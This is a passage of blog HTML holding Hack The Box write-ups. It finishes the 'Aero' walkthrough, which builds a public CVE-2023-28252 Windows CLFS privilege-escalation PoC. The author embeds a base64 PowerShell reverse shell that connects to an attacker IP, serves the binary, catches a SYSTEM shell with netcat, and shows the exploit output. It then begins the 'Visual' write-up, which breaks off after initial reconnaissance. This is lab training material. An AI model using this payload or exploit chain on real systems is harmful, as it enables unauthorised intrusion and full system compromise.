url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABq0lEQVR42o2U6W6DQAyEef+n41ekkIuQ+wByKoEgXH2uZrXpoTaSZa/x2uOxs8nr9bKyLO1wOFhVVXY8Hu18Ptvz+XR5PB5GzH9/CZeyLLPhcGij0chlPp/bZrOx7XZr6/Xai1Gk7/twEVvn2J+AYDabeRKkKIqQBFmtVna5XL5d/BVh0zSehGR1XdvtdrPr9eoiW223bWvEoyX46bLrus+EOMfjsbc6nU5tMpm45HnuyPFjI/jjOL4vl0ufAcUDh2ma2mAw8CA0QhGCaX+/3zun2Ag00NVisXCbhAALLVOdywQoUMEMBh8xnEFFAYSNQIvjt4TikdW53++BT6pjI0waDafikPt0qdUKayPOaBV0JAcRyBF4kx13hB9NnpBQq6IA2mC6oNXET6dT0CCVcCYHSFkrb5lEMYey0QwDtNgxv5wprB0meVgbAvhIi5qikMGnbKFiCAg+OAUlwELLcEIVtKZLYvHGGRsfMWj979mCt5ZByIXdbueBtAhazgRj8xfkm2I4swGI0L7toXjQw6Apx/sHQq0WcRogRSkANZ4wfj2+2j+9KH89EB/yibnxkXSCnQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CVE-2023-28252_Summary" title="" src="/static/44745b08c47890360faa11177c83a328/50637/CVE-2023-28252_Summary.png" srcset="/static/44745b08c47890360faa11177c83a328/dda05/CVE-2023-28252_Summary.png 158w, /static/44745b08c47890360faa11177c83a328/679a3/CVE-2023-28252_Summary.png 315w, /static/44745b08c47890360faa11177c83a328/50637/CVE-2023-28252_Summary.png 630w, /static/44745b08c47890360faa11177c83a328/43df9/CVE-2023-28252_Summary.png 801w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The above document is outlining CVE-2023-28252 which is a privilege escalation vulnerability in Windows Common Log File System (CLFS).</p> <p>I checked the patch level on the machine by running <code class="language-text">systeminfo</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\sam.emerson\documents> systeminfo systeminfo Host Name: AERO OS Name: Microsoft Windows 11 Pro N OS Version: 10.0.22000 N/A Build 22000 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: sam.emerson Registered Organization: Product ID: 00332-00332-83900-AA094 Original Install Date: 9/18/2023, 12:06:55 PM System Boot Time: 8/7/2024, 1:29:27 PM System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz [02]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2445 Mhz BIOS Version: VMware, Inc. VMW71.00V.23553139.B64.2403260936, 3/26/2024 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: en-us;English (United States) Input Locale: en-us;English (United States) Time Zone: (UTC-08:00) Pacific Time (US &amp; Canada) Total Physical Memory: 4,095 MB Available Physical Memory: 2,575 MB Virtual Memory: Max Size: 5,503 MB Virtual Memory: Available: 3,802 MB Virtual Memory: In Use: 1,701 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: \\AERO Hotfix(s): 7 Hotfix(s) Installed. [01]: KB5004342 [02]: KB5010690 [03]: KB5012170 [04]: KB5026038 [05]: KB5026910 [06]: KB5023774 [07]: KB5029782 Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Ethernet0 2 DHCP Enabled: No IP address(es) [01]: 10.10.11.237 [02]: fe80::91d6:697c:1dfb:ca4d [03]: dead:beef::f1b6:893:79ab:dbf [04]: dead:beef::7ded:f2fb:3252:ba5f Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.</code></pre></div> <p>The Microsoft page for <a href="https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28252" target="_blank">CVE-2023-28252</a> lists the security patches that address the vulnerability. As shown in the <code class="language-text">systeminfo</code> output above, of the 7 installed hotfixes, the system was missing the Windows 11 x64-based patch (KB5025224) for CVE-2023-28252.</p> <p>A PoC for CVE-2023-28252 is available on GitHub <a href="https://github.com/fortra/CVE-2023-28252" target="_blank">here</a>.</p> <p>After downloading the PoC, I opened the solution in Visual Studio. Near the bottom of <code class="language-text">clfs_eop.cpp</code>, the code verifies whether the current user is <code class="language-text">SYSTEM</code> and, if so, runs <code class="language-text">notepad.exe</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 611px; " > <a class="gatsby-resp-image-link" href="/static/113ef36db4cc2c5a92847f3385a2ec4f/a4271/clfs_eop.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 65.18987341772153%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB7klEQVR42o1T2W7bQBDzb8RanXvpWq3kI3FiI3WCIs95aIGi//8fLEdy0gI1Aj8Qtka7HA45WsUxwjmHoiyRJQrVNqL+/ozx9Irt8xmnlyeYqoJKEqRKoJCmghRZlv2HVR96GGNQCiEPGeNQtwF1Q2LXwTcNitrD+Bq2CTBsbpyH1prnF2JFfDRYxbgorKhCCrqsMPQj9rsjDg9n9CEiUvX9dovD4Qlyvt89Yjq+wndszEZd1yCEeiHcbDZzURTKKA1VDV2EtZpqNesFvC6hi5zNcjhbwXvLKRpoa3nGLs/eLITjOLLgURTFXCiLEk3Nrm2LhuM62hFbD8sJrDVU0lAlMfCdFbKa5zxVegoiYQiBB90nYcWRxZM1Q7hjSHdqQcp3ckGpFAnryVrN/5VSM6Q2K1wI7exhmqVU4rEbA87HDb4dHokT9gzuPHXYxx6e6utG/Pqbcp7nMy4eTsvaiEIpstsbR/r98oAfDOMX8T50+Bk7TM5AyeUr6/K5NtO0eLiEksJzJWyhka8T5ByjIHI2kR2VHcy+ILs6stMeMQwIsWXaNVqqGvnbM5j84vNNhAXXQ0yXdQlM0Ds2Ya0iiam4NsSHT18SbrbcQxotHkpasR9wuj/NitUl3X+/hJsUyqenKz0rkIupuu3yNcI/EflxglgzFMsAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="clfs_eop.cpp" title="" src="/static/113ef36db4cc2c5a92847f3385a2ec4f/a4271/clfs_eop.png" srcset="/static/113ef36db4cc2c5a92847f3385a2ec4f/dda05/clfs_eop.png 158w, /static/113ef36db4cc2c5a92847f3385a2ec4f/679a3/clfs_eop.png 315w, /static/113ef36db4cc2c5a92847f3385a2ec4f/a4271/clfs_eop.png 611w" sizes="(max-width: 611px) 100vw, 611px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>In the <code class="language-text">system()</code> command, I replaced <code class="language-text">notepad.exe</code> with PowerShell #3 (Base64) from <a href="https://www.revshells.com/" target="_blank">revshells</a>:</p> <div class="gatsby-highlight" data-language="cpp"><pre class="language-cpp"><code class="language-cpp"><span class="token function">system</span><span class="token punctuation">(</span><span class="token string">"powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgA0ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="</span><span class="token punctuation">)</span><span class="token punctuation">;</span></code></pre></div> <p>I set the build configuration to <code class="language-text">Release</code> and <code class="language-text">x64</code>, then built the solution:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">Build started at 2:28 PM... 1>------ Build started: Project: clfs_eop, Configuration: Release x64 ------ 1>clfs_eop.cpp 1>C:\Users\mike\Desktop\HTB\Aero\CVE-2023-28252-master\clfs_eop\clfs_eop.cpp(617,9): warning C4477: 'printf' : format string '% p' requires an argument of type 'void *', but variadic argument 1 has type 'UINT64' 1>C:\Users\mike\Desktop\HTB\Aero\CVE-2023-28252-master\clfs_eop\clfs_eop.cpp(1449,11): warning C4477: 'printf' : format string '%p' requires an argument of type 'void *', but variadic argument 1 has type 'UINT64' 1>C:\Users\mike\Desktop\HTB\Aero\CVE-2023-28252-master\clfs_eop\clfs_eop.cpp(1465,4): warning C4312: 'type cast': conversion from 'unsigned int' to 'UINT64 *' of greater size 1>C:\Users\mike\Desktop\HTB\Aero\CVE-2023-28252-master\clfs_eop\clfs_eop.cpp(1471,4): warning C4312: 'type cast': conversion from 'unsigned int' to 'UINT64 *' of greater size 1>LINK : /LTCG specified but no code generation required; remove /LTCG from the link command line to improve linker performance 1>clfs_eop.vcxproj -> C:\Users\mike\Desktop\HTB\Aero\CVE-2023-28252-master\x64\Release\clfs_eop.exe 1>Done building project "clfs_eop.vcxproj". ========== Build: 1 succeeded, 0 failed, 0 up-to-date, 0 skipped ========== ========== Build completed at 2:28 PM and took 09.966 seconds ==========</code></pre></div> <p>From within the directory containing the compiled project, <code class="language-text">clfs_eop.exe</code>, I started a Python web server:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero\CVE-2023-28252-master\x64\Release > ls Directory: C:\Users\mike\Desktop\HTB\Aero\CVE-2023-28252-master\x64\Release Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 8/7/2024 2:28 PM 347648 clfs_eop.exe -a---- 8/7/2024 2:28 PM 6303744 clfs_eop.pdb PS C:\Users\mike\Desktop\HTB\Aero\CVE-2023-28252-master\x64\Release > python3 -m http.server Serving HTTP on :: port 8000 (http://[::]:8000/) ...</code></pre></div> <p>On the target, I downloaded <code class="language-text">clfs_eop.exe</code> in <code class="language-text">C:\programdata</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> wget 10.10.14.64:8000/clfs_eop.exe -o clfs_eop.exe wget 10.10.14.64:8000/clfs_eop.exe -o clfs_eop.exe PS C:\programdata> ls ls Directory: C:\programdata Mode LastWriteTime Length Name ---- ------------- ------ ---- d---s- 9/18/2023 3:29 PM Microsoft d----- 9/18/2023 1:13 PM Microsoft OneDrive d----- 8/7/2024 1:30 PM Package Cache d----- 9/20/2023 7:34 AM Packages d----- 8/7/2024 1:29 PM regid.1991-06.com.microsoft d----- 6/5/2021 5:10 AM SoftwareDistribution d----- 6/5/2021 7:22 AM ssh d----- 9/18/2023 1:07 PM USOPrivate d----- 6/5/2021 5:10 AM USOShared d----- 9/18/2023 1:20 PM VMware -a---- 8/7/2024 2:35 PM 347648 clfs_eop.exe</code></pre></div> <p>I started a listener with netcat and then ran <code class="language-text">clfs_eop.exe</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero > c:\tools\netcat\nc.exe -lvnp 443 listening on [any] 443 ...</code></pre></div> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\programdata> .\clfs_eop.exe .\clfs_eop.exe [+] Incorrect number of arguments ... using default value 1208 and flag 1 for w11 and w10 ARGUMENTS [+] TOKEN OFFSET 4b8 [+] FLAG 1 VIRTUAL ADDRESSES AND OFFSETS [+] NtFsControlFile Address --> 00007FFA5F084240 [+] pool NpAt VirtualAddress -->FFFF8683655FE000 [+] MY EPROCESSS FFFFAC8F787A8140 [+] SYSTEM EPROCESSS FFFFAC8F738FB040 [+] _ETHREAD ADDRESS FFFFAC8F77045080 [+] PREVIOUS MODE ADDRESS FFFFAC8F770452B2 [+] Offset ClfsEarlierLsn --------------------------> 0000000000013220 [+] Offset ClfsMgmtDeregisterManagedClient --------------------------> 000000000002BFB0 [+] Kernel ClfsEarlierLsn --------------------------> FFFFF8065D443220 [+] Kernel ClfsMgmtDeregisterManagedClient --------------------------> FFFFF8065D45BFB0 [+] Offset RtlClearBit --------------------------> 0000000000343010 [+] Offset PoFxProcessorNotification --------------------------> 00000000003DBD00 [+] Offset SeSetAccessStateGenericMapping --------------------------> 00000000009C87B0 [+] Kernel RtlClearBit --------------------------> FFFFF80658543010 [+] Kernel SeSetAccessStateGenericMapping --------------------------> FFFFF80658BC87B0 [+] Kernel PoFxProcessorNotification --------------------------> FFFFF806585DBD00 PATHS [+] Folder Public Path = C:\Users\Public [+] Base log file name path= LOG:C:\Users\Public\47 [+] Base file path = C:\Users\Public\47.blf [+] Container file name path = C:\Users\Public\.p_47 Last kernel CLFS address = FFFF868358F2C000 numero de tags CLFS founded 9 Last kernel CLFS address = FFFF86835EAE7000 numero de tags CLFS founded 1 [+] Log file handle: 0000000000000104 [+] Pool CLFS kernel address: FFFF86835EAE7000 number of pipes created =5000 number of pipes created =4000 TRIGGER START System_token_value: FFFF868354641595 SYSTEM TOKEN CAPTURED Closing Handle ACTUAL USER=SYSTEM #&lt; CLIXML</code></pre></div> <p>Netcat caught a shell as <code class="language-text">nt authority\system</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">PS C:\Users\mike\Desktop\HTB\Aero > c:\tools\netcat\nc.exe -lvnp 443 listening on [any] 443 ... connect to [10.10.14.64] from (UNKNOWN) [10.10.11.237] 57387 PS C:\programdata> whoami nt authority\system PS C:\programdata> cd \users\administrator\desktop PS C:\users\administrator\desktop> ls Directory: C:\users\administrator\desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 8/7/2024 1:30 PM 34 root.txt</code></pre></div>https://mgarrity.com/hack-the-box-visual/https://mgarrity.com/hack-the-box-visual/Sat, 03 Aug 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8999a028d52d2a5043815f1f79ceba25/3b67f/visual.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/ElEQVR42mMQkdX+jwuLymn/F5LW/s8trv1fUAbCx6cehBnwGcYjof1fXknzv4W+BpjmkSRsKAMuw/iAmq2Mtf/nRdn8L8rx/58XbfPfwggoLoXfUKwGCgG9J6uk/b8m0vh/SFXef6lJi/8npMb+rw43/C+lCJEn2kCQ7bxAr+ro6/6flWn0v2Fu8X+PQ2v/93ak/J8co/Vfx0AX7HpcrsTtQmWd/yVBOv/j/Gz+G4Sn/vezt/xfFqD+X1pJlzQXgrAY1JUWxjr/0zzV/6c4Kv5P8VD7b2as+59XkowwhHsdqFleRee/uYku2MW85MYyskuFZSAGg2gxItIhAKY+BQgwAA3cAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Visual" title="" src="/static/8999a028d52d2a5043815f1f79ceba25/50637/visual.png" srcset="/static/8999a028d52d2a5043815f1f79ceba25/dda05/visual.png 158w, /static/8999a028d52d2a5043815f1f79ceba25/679a3/visual.png 315w, /static/8999a028d52d2a5043815f1f79ceba25/50637/visual.png 630w, /static/8999a028d52d2a5043815f1f79ceba25/fddb0/visual.png 945w, /static/8999a028d52d2a5043815f1f79ceba25/3b67f/visual.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Visual is a Windows machine hosting a website that compiles Visual Studio projects from a remote Git repository. Command execution on the box can be achieved by specifying a pre-build event within the project, this can be leveraged to obtain a shell as the user <code class="language-text">enox</code>. Enumeration of the machine can lead to the discovery that the current user has write permission in <code class="language-text">c:\xampp\htdocs</code>, allowing for a PHP web shell to be written into the web root. This can then be used to obtain a shell as <code class="language-text">local service</code>. The service account is running with limited privileges, but any of the privileges that have been restricted for this account can be recovered using the FullPowers tool, most notably <code class="language-text">SeImpersonate</code>. With this privilege, a potato attack can be used to obtain a system shell.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ nmap -sC -sV -oA nmap/output 10.10.11.234 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-31 07:01 EDT Nmap scan report for 10.10.11.234 Host is up (0.040s latency). Not shown: 999 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17) |_http-title: Visual - Revolutionizing Visual Studio Builds |_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 16.57 seconds</code></pre></div> <p>The only open port was <code class="language-text">80</code>, the webpage compiles Visual Studio projects from a remote Git repo with support for projects written in <code class="language-text">.NET 6.0</code> and <code class="language-text">C#</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1c79813097524ee93bade6768e84e571/41b8e/visual-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 166.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAhCAYAAADZPosTAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEWElEQVR42pVV227cVBSdPwGJqg1QLk+AWtFIgyjijT/gF5D4CyQq8cIjz/AHiCIeaZMQmiZpEuZizzhzSzJX2+PLHNuLvbbjyUxmEqilLZ9zvM46++y193bpowef4lH5c5Qff4mPHzzCJw83X8u4Z7P8GA83yyBXyfM80Fyae2UT11VzL22ysraML3hKkCfLMiTpsqUZDQu2ME9X8eTgU+LAJAnCKJ5bEEboD0cYjSfw/KkaPRzImuv5GE1cxVzhY+Ugl3qYpCmieDY3zg8OX+Gv3RfYe3mAfRmfVKrY2z/UtVdHJ4qLZ0aNpNyjHiphkuqHicSgUq2jbjdw2uro27KbqFsNNee0pXPLzufVmoXxxNO95FhD6KPhnKLV7srmNhrNUzhCbDeaut50WkralDEPJPlYrr+WkFeYBqGeytMtIanVLfXGbjpC6qjHXCOGb97Glz0apnWENAZ/OBqj3emqtdod9fa01dYxjWNiKBbjV8R9mVDcdr0p+oMhzi/6erViM6/ntHJSkrc7PcVc9Afwp8F6DzWG4h3jUrNsvV4uTk5iSzxb4rHGU0JQqdUVdyMhF/mRuUYvmYMUQYlloyUxZOwo2ECuS8yZeMlrrxLK/cMoz6uZSebG5OUhNApWxIzf4lmOIdlqHi4kdiyWJSTn3MyTt7A8oQWTXhVCeF2UxYeeX7gZYpPhpkecw9kkr+3rjxKy8GNxX0bojDN88UOG3Wam80h2p3I6McwEORIvnAzlJxl6k1Tn3JsWzeEqhjEuJMidswH+2B+j3upjNBrpuhG3kyTREPgSx0ZngN/3hoIdSmyD9aJQgFrd1ibQsOs4Oj7JK0EESZQwVWGYRpVqFZZVxfHxP+h0z3R9rShsTWy0s7BourmqBSHHnh9og40jYnw5MFxVuWiwMkIQZ/j1MEPfy+dJkjdPhqjADKcZnh5lou4y5koUYY/jPOCtgcFnT1JsW5wbjRu9IyaK8rU9x+CrH1N0xyJkZjTV0kUP2dJ5FZZUu9tDxZYalopgpbA7a8u/vHJHvjdknRi2t3Op5xVRuIHB1zYlxt5HMPse48r40IihKCxHHk4MG8hUBE2vi8IqoNJBKIoZltpU1SuaZyEcRQjC4BITzDHpTaKMA+D7p4Dd1y8wAlRRGL3L0mgMgO9+A9woxyz99YpuE2pgDdqDCN/+EuNlU9DZTJsGk5qYIGKdxzhwInzz8wy9YQRj4hyTrknswXCMmvS5drMi75q0qJGuk4y/SV5tNHbR7XYQ+n10ez3N1VVRxF3+bKhgWzK/YjnSTHvo9c6l1U9yUVgp2s7kH+2HGPmJHMLrJsuE+qM3Zv7jppJsrkWVMOgzY9S8qYQhjfBnJcLXP81Q6Yq6hhhefeFH/7qPEWe8Gda3r63tHdxmz7e28ez5lry38EyMa9s7O/h7N39fx5fevLOB2+zOxn3ce/cDbIjdfed9vPHWvVvx/0l49+33sHH/Q7H/R/gvJYJRQiaW91YAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visual webpage" title="" src="/static/1c79813097524ee93bade6768e84e571/50637/visual-webpage.png" srcset="/static/1c79813097524ee93bade6768e84e571/dda05/visual-webpage.png 158w, /static/1c79813097524ee93bade6768e84e571/679a3/visual-webpage.png 315w, /static/1c79813097524ee93bade6768e84e571/50637/visual-webpage.png 630w, /static/1c79813097524ee93bade6768e84e571/fddb0/visual-webpage.png 945w, /static/1c79813097524ee93bade6768e84e571/41b8e/visual-webpage.png 1029w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I started a python web server and tested the form:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 474px; " > <a class="gatsby-resp-image-link" href="/static/51001182624acda306ea296ac4c0eb79/a9480/visual-webpage-form-test.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.72151898734178%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABlklEQVR42q1Tu0oDQRTNvwj+gKWtWGsnguB/iKWFCNpZiGhj5x9YaWehIGrQaEJem+wmqyHJJvuYuTPHO5MYSWQ1PgYOl7nn3nPnDDMZfLPOcxonlxoXTxrTrIzmOqX0GIg4yUQ30lg9VFg/Vlg5UHbPhOUne/RwXoaUQhQniBMxQhQLCJHA7yRY2CXMbyss7hGa7cTmw8l6htFJFRSSIElZnF4p7JxpG82eGImQ0wmaaIpfWy3U3QYazRcEbR9h10fU78Cp1eF6TbS7wZjol4LmdFWnjvvsA/KFInKFMh7zZeSLVeSeC7i5vUPda9i6Ud8nwaGYIc1kU0xEtkjSu32ydk1OyHHLcdoJm76PStWB49TYmgfXdVGuVFAsFVEqlXnvWWGttYXi3hTLgylhFKEb9NEPI0aM0MR+iKAXosfR8HFi7lmMkHLCD8JYjmLJlMR1iTCzoTG3pTG7qZGtcV7z4Fj87NmYBtOYrQks7RPWjgjLHPMe59UvBEfvkS0RCUiOisYtpgoOLlZaq3+B+X5WEP+83gDsBjayOC7MWwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visual webpage form test" title="" src="/static/51001182624acda306ea296ac4c0eb79/a9480/visual-webpage-form-test.png" srcset="/static/51001182624acda306ea296ac4c0eb79/dda05/visual-webpage-form-test.png 158w, /static/51001182624acda306ea296ac4c0eb79/679a3/visual-webpage-form-test.png 315w, /static/51001182624acda306ea296ac4c0eb79/a9480/visual-webpage-form-test.png 474w" sizes="(max-width: 474px) 100vw, 474px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Submitting the form showed the following:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/515767521b821f15bbe74a6e306eef9f/a1ee8/visual-webpage-build-status.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAA7DAAAOwwHHb6hkAAABD0lEQVR42oXO207CQBAG4H2KyvbEhS3F7qHbky2lBTkFEKPGeEMwhPd/id9lJcTEqBdf5s/OzmTIwPVQZCW2T2/Y7l4xna3RTVdGO1nC6wewet6/bmjfIJNugcXyEbvnd6w3L5jON6hGM4yqBzTdCvVojqzokKQNVN4gKzukRavfWl3HSPPW9LmsMBimIHlRoShrlPc1zjnV1zKegAuFmCsImenPqc4JhMgQDTnCKMYgYlp8FYR3uA2GIJwzsDhGfCGl0IPcVC6YyZxzMMagVALf90FpD7Zta/TKcWyDHI9H7Pd743D4wOl0QtOMYVmWGaKUXoa/suM4cF33V0RKie+UUgjD0DQ9z/vhr2XnhZ/EhLQNfQQPwAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="visual webpage build status" title="" src="/static/515767521b821f15bbe74a6e306eef9f/50637/visual-webpage-build-status.png" srcset="/static/515767521b821f15bbe74a6e306eef9f/dda05/visual-webpage-build-status.png 158w, /static/515767521b821f15bbe74a6e306eef9f/679a3/visual-webpage-build-status.png 315w, /static/515767521b821f15bbe74a6e306eef9f/50637/visual-webpage-build-status.png 630w, /static/515767521b821f15bbe74a6e306eef9f/a1ee8/visual-webpage-build-status.png 706w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The request from the server attempted to access Git repository information at the expected location for Git metadata (<code class="language-text">/info/refs</code>), and then tried to perform the Git operation <code class="language-text">git-upload-pack</code>. Since the python web server was not set up to serve a Git repository, it returned a 404 error:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Visual] └─$ python3 -m http.server Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ... 10.10.11.234 - - [31/Jul/2024 07:19:22] code 404, message File not found 10.10.11.234 - - [31/Jul/2024 07:19:22] "GET /test/info/refs?service=git-upload-pack HTTP/1.1" 404 -</code></pre></div> <p>The following error message was shown on the Visual webpage:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/bdde00947a833075d9dcdca938b3fb74/9f2f1/visual-webpage-error-message.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 29.11392405063291%; position: relative; bottom: 0; left: 0; background-image: 